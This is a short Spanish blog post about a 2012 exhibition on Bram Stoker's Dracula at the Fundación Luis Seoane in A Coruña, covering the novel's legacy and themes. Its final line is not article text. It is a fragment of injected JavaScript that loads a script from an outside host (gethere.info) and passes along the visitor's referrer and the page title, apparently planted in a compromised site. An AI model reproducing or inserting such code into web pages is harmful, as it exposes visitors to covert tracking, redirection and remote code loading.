Drácula en A Coruña

03/09/2012

En 1897 un tal Bram Stoker -por aquel entonces un escritor irlandés del montón- publica una obra titulada Drácula, basada en conversaciones mantenidas con un erudito húngaro sobre un tal Vlad Draculea. En 1983 Drácula pasa a formar parte de la biblioteca de clásicos de la Universidad de Oxford. Menos mal. Después de años deambulando por manos de cineastas, escritores y demás artistas reconocidos, ya le tocaba dejar de ser una mera novela de terror sensacionalista.

Y ahora, cuando se cumplen 100 años de la muerte de Stoker, la Fundación Luis Seoane en A Coruña (hasta el 7 de octubre), recorre este controvertido personaje vampírico a través de películas, carteles, obras de arte, cómics… La exposición plasma a la perfección la influencia que la novela ha tenido durante años en teatro, cine y televisión de todo el mundo.

Comprobareis que la novela de Drácula va mucho más allá de la simple leyenda vampírica, pues ofrece una visual bastante acertada del papel de la mujer en la época victoriana, del colonialismo o incluso de la sexualidad.

Foto |  Ben Templesmith

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;